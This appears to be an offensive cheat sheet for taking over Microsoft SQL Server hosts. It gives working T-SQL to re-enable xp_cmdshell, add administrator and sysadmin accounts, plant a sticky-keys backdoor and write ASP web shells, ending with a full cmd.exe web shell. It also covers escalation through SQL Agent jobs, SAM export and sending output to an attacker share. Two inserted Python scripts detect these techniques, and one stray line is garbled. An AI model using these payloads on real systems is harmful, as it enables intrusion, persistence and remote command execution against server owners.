1. Could not find stored procedure 'master..xp_cmdshell'. Use EXEC master.dbo.sp_addextendedproc with one of the three methods below; when running them at an injection point, add a space and a ; after each.
Recovery: connect with Query Analyzer, then
Step 1, run: EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Step 2, run: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Then press F5; the commands are executed.

2. Cannot load the DLL xpsql70.dll, or one of the DLLs it references. Reason: 126 (The specified module could not be found.)
Recovery: connect with Query Analyzer, then
Step 1, run: EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell'
Step 2, run: EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Then press F5; the commands are executed.

3. Cannot find the function xp_cmdshell in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)
Recovery: connect with Query Analyzer, then
Step 1, run: exec sp_dropextendedproc 'xp_cmdshell'
Step 2, run: exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Then press F5; the commands are executed.

4. Last resort.
If none of the methods above restores it, try adding an account directly with the following:
After connecting with Query Analyzer,
Windows 2000 Server:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user <newuser> <password> /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators <newuser> /add'

Windows XP or 2003 Server:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user <newuser> <password> /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators <newuser> /add'

Five-times Shift (sticky keys):
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

Another way to run commands through xp_cmdshell
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'

Check whether the extended stored procedure exists
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it is there.

Statement to restore xp_cmdshell after uploading xplog70.dll:
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'

Otherwise upload xplog70.dll:
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'

First enable sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

Then use Jet OLEDB to run a system command:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
This returned an error that c:\windows\system32\ias\ias.mdb could not be found. Running exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- showed that c:\windows\system32\ias\ias.mdb was gone, presumably deleted by the administrator, and the other mdb was gone as well.
The sp_addextendedproc procedure used for the recovery is as follows:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517), /* (owner.)name of function to call */
@dllname varchar(255)     /* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
5 p* z5 r/ B4 p! b7 a2 _9 }8 L* E3 j
Export the administrator's password file
sa can read the SAM key by default. Probably.
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
Log in as administrator.
After finishing with the machine:
reg import c:\test.reg
No need to clone at all.
Find the matching SID.
Restore all the stored procedures
use master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'

Create a stored procedure that reads files
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from ''' + @filename + '''')
select * from #tempfile
drop table #tempfile
End

exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp'  -- read a file with the procedure just created
View logins
Select * from sysxlogins

Read a file's contents into a table
BULK INSERT tmp from 'c:\test.txt'
delete from <table name>  -- clear the table's contents
create table b_test(fn nvarchar(4000));  -- create a table with one column, fn

Add an sa-level user
exec master.dbo.sp_addlogin 'user','pass';
exec master.dbo.sp_addsrvrolemember 'user','sysadmin'

File-read code
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, '<filename>', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

File-write code:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<content>'

Add the lake2 shell
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
sp_dropextendedproc xp_lake2
EXEC xp_lake2 'net user'

Get disk file information
-- parameters: directory name, directory depth, whether to list files
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1

Read the Serv-U configuration
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'

Write a Shift backdoor with xp_regwrite
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\cmd.exe on';--
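The xp_regwrite line above plants a Debugger value under Image File Execution Options for sethc.exe, so pressing Shift five times at the logon screen launches the "debugger" instead. As an added example that is not from the original post, here is a Python checker that parses the text `reg export` writes for that key (the sample below is constructed) and reports every IFEO subkey carrying a Debugger value; entries for accessibility binaries such as sethc.exe and utilman.exe are rated high because they run before anyone logs in. The binary list and the severity labels are this example's own.

```python
"""Flag Image File Execution Options 'Debugger' hijacks in a reg export.

Added example, not part of the original post. It parses the text that
`reg export` writes (SAMPLE_REG_EXPORT below is constructed) and reports
IFEO subkeys carrying a Debugger value, which is what the xp_regwrite
line in the notes creates for sethc.exe.
"""
import re

# Accessibility helpers reachable from the logon screen; a Debugger value on
# any of them runs an arbitrary program before anyone logs in. This list is
# the example's own.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}

IFEO_KEY = r"software\microsoft\windows nt\currentversion\image file execution options"

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text):
    """Return {key_path: {value_name: raw_value}} from reg-export text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        key_match = KEY_RE.match(line)
        if key_match:
            current = key_match.group(1)
            keys.setdefault(current, {})
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current is not None:
            keys[current][value_match.group(1)] = value_match.group(2)
    return keys


def find_ifeo_debuggers(text):
    """Return [{'exe', 'debugger', 'severity'}] for IFEO entries with a Debugger."""
    findings = []
    for key, values in parse_reg_export(text).items():
        _hive, _sep, path = key.lower().partition("\\")
        if not path.startswith(IFEO_KEY + "\\"):
            continue
        exe = path[len(IFEO_KEY) + 1:]
        if "\\" in exe:  # nested subkeys such as PerfOptions, not the exe entry itself
            continue
        # Registry value names are case-insensitive; xp_regwrite wrote 'debugger'.
        lowered = {name.lower(): val for name, val in values.items()}
        debugger = lowered.get("debugger")
        if debugger is None:
            continue
        # .reg string values are "..." with backslashes doubled.
        value = debugger.strip('"').replace("\\\\", "\\")
        severity = "high" if exe in ACCESSIBILITY_BINARIES else "review"
        findings.append({"exe": exe, "debugger": value, "severity": severity})
    return findings


# Constructed sample, shaped like `reg export` output for the IFEO key.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"debugger"="c:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\tools\\mydebugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"DisableExceptionChainValidation"=dword:00000000
"""

if __name__ == "__main__":
    for finding in find_ifeo_debuggers(SAMPLE_REG_EXPORT):
        print(f"[{finding['severity']}] {finding['exe']} -> {finding['debugger']}")
```

On a real host, run reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg and pass the file contents to find_ifeo_debuggers(); note that reg export writes UTF-16, so open the file with encoding="utf-16". The check is case-insensitive on the value name on purpose, because the xp_regwrite call writes it as 'debugger' rather than 'Debugger'.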

Find the web path, then run exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '
Backing up a small shell this way is enough.

EXECUTE sp_makewebtask @outputfile = '<web absolute path>\<exported file name>.asp', @query = 'SELECT <your column> FROM <your temporary table>'

How to enable xp_cmdshell on SQL Server 2005
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

Enabling OPENROWSET support on SQL 2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

Enabling sp_oacreate support on SQL 2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

Not sure whether the following works; leaving it here to study:
4)
use msdb; -- not master here
exec sp_add_job @job_name = 'czy82';
exec sp_add_jobstep @job_name = 'czy82', @step_name = 'Exec my sql', @subsystem = 'CMDEXEC', @command = 'dir c:\ > c:\b.txt';
exec sp_add_jobserver @job_name = 'czy82', @server_name = 'smscomputer';
exec sp_start_job @job_name = 'czy82';

MSSQL's job processing can also be used to run commands, and if the subsystem parameter above is tsql, what follows lets us run T-SQL statements.
When using these stored procedures: first, @server_name must be set to your SQL server's name; second, the SQLSERVERAGENT service must be running (not started by default, annoyingly).
net start SQLSERVERAGENT

One other difference here is that public can execute it too. There is a system hole here as well; see below:
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '<your SQL server name>'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

Don't doubt the code above, I tested it successfully! Note xp_execresultset here: it is what lets us run xp_cmdshell as public.
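The enable statements under "SQL Server 2005" and the SQL Agent job steps above are the changes a defender most wants to catch in audit logs. The following Python scanner is an added example, not from the original post: it runs over constructed sample batches that mirror the statements in these notes (placeholders instead of credentials) and flags the patterns seen here, namely enabling xp_cmdshell / Ole Automation Procedures / Ad Hoc Distributed Queries, sp_addextendedproc registrations, sp_oacreate of wscript.shell, xp_regwrite to the IFEO or Jet SandBoxMode keys, Jet shell() through openrowset, Agent job steps using CMDEXEC or xp_execresultset, and sp_makewebtask. It also joins adjacent string literals before matching, so the 'xp_'+'cmdshell' trick is caught and labelled. The rule names are this example's own; real input would be batch text recorded by SQL Server Audit or an Extended Events session.

```python
"""Flag MSSQL abuse patterns in captured T-SQL batch text.

Added example, not part of the original post. SAMPLE_BATCHES are constructed
to mirror the statements in these notes, with placeholders instead of real
credentials; real input would be batch text from SQL Server Audit or an
Extended Events session.
"""
import re

FLAGS = re.IGNORECASE | re.DOTALL

# (finding name, pattern). The names are this example's own labels.
RULES = [
    ("enable-dangerous-feature", re.compile(
        r"sp_configure\s+'(?:xp_cmdshell|ole automation procedures"
        r"|ad hoc distributed queries)'\s*,\s*'?1'?", FLAGS)),
    ("register-extended-proc", re.compile(r"\bsp_addextendedproc\b", FLAGS)),
    # A quoted 'xp_cmdshell' is an argument (to sp_configure and the like);
    # an unquoted one is a call.
    ("os-command-xp_cmdshell", re.compile(r"(?<!')xp_cmdshell\b", FLAGS)),
    # exec @var: procedure name built at run time, as in the 'xp_'+'cmdshell' trick.
    ("dynamic-proc-name", re.compile(r"\bexec(?:ute)?\s+@\w+", FLAGS)),
    ("ole-automation-shell", re.compile(
        r"sp_oacreate\s+'(?:wscript\.shell|scripting\.filesystemobject)'", FLAGS)),
    ("registry-persistence", re.compile(
        r"xp_regwrite\b.*?(?:image file execution options|sandboxmode)", FLAGS)),
    ("jet-shell", re.compile(
        r"openrowset\s*\(\s*'microsoft\.jet\.oledb.*?\bshell\s*\(", FLAGS)),
    ("agent-job-command", re.compile(
        r"sp_add_jobstep\b.*?(?:@subsystem\s*=\s*'cmdexec'|xp_cmdshell|xp_execresultset)",
        FLAGS)),
    ("file-write-webtask", re.compile(r"\bsp_makewebtask\b", FLAGS)),
]

CONCAT_RE = re.compile(r"'\s*\+\s*'")   # 'xp_' + 'cmdshell'  ->  'xp_cmdshell'
SPACE_RE = re.compile(r"\s+")


def normalize(batch):
    """Join adjacent string literals and collapse whitespace before matching."""
    return SPACE_RE.sub(" ", CONCAT_RE.sub("", batch)).strip()


def scan_batch(batch):
    """Return the list of finding names that fire on one batch ([] if clean)."""
    text = normalize(batch)
    findings = [name for name, rx in RULES if rx.search(text)]
    # If joining literals changed the text, the batch was hiding a name.
    if findings and text != SPACE_RE.sub(" ", batch).strip():
        findings.append("literal-concatenation")
    return findings


def scan_batches(batches):
    """Return [(index, findings)] for every batch with at least one finding."""
    results = []
    for i, batch in enumerate(batches):
        findings = scan_batch(batch)
        if findings:
            results.append((i, findings))
    return results


# Constructed sample input (placeholders, not real credentials).
SAMPLE_BATCHES = [
    "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    "declare @a sysname set @a='xp_'+'cmdshell' exec @a 'whoami'",
    r"exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT"
    r"\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ',"
    r"'c:\windows\system32\cmd.exe'",
    r"exec sp_add_jobstep @job_name = 'nightly', @step_name = 'step1',"
    r" @subsystem = 'CMDEXEC', @command = 'dir c:\ > c:\b.txt'",
    "SELECT name FROM sys.databases",
    "exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'",
]

if __name__ == "__main__":
    for index, findings in scan_batches(SAMPLE_BATCHES):
        print(f"batch {index}: {', '.join(findings)}")
```

The os-command rule deliberately ignores a quoted 'xp_cmdshell', so an sp_configure call is reported once (as the enable) rather than twice, while the variable-exec rule still catches the batch that hides the name behind exec @a. Hooking this up to a live feed is a matter of replacing SAMPLE_BATCHES with the statement text from the audit source.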

5) About the Microsoft SQL Agent Jobs arbitrary file delete/overwrite vulnerability (works for public users too)
There is an article on XFocus: http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFilecreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFilecreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFilecreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFilecreate'

If the chosen subsystem is tsql, the generated file starts with the following header:

Job 'ArbitraryFilecreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.

(1 row(s) affected)

So when creating a file I suggest choosing cmdexec as the subsystem; used well, we could write a vbs file containing an add-administrator command into the startup folder!

6) About sp_makewebtask (it can write a file with any content under any file name)
For sp_MScopyscriptfile see the example below
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile = 'c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,

Both of these are still being tested.
Getting a local web shell for an MSSQL public user

sp_makewebtask @outputfile = 'd:\sms\a.asp', @charset = 'gb2312',
--@query = 'select ''<img src=vbscript:msgbox(now())>''',
--@query = 'select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>''',
@query = 'select ''
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>'''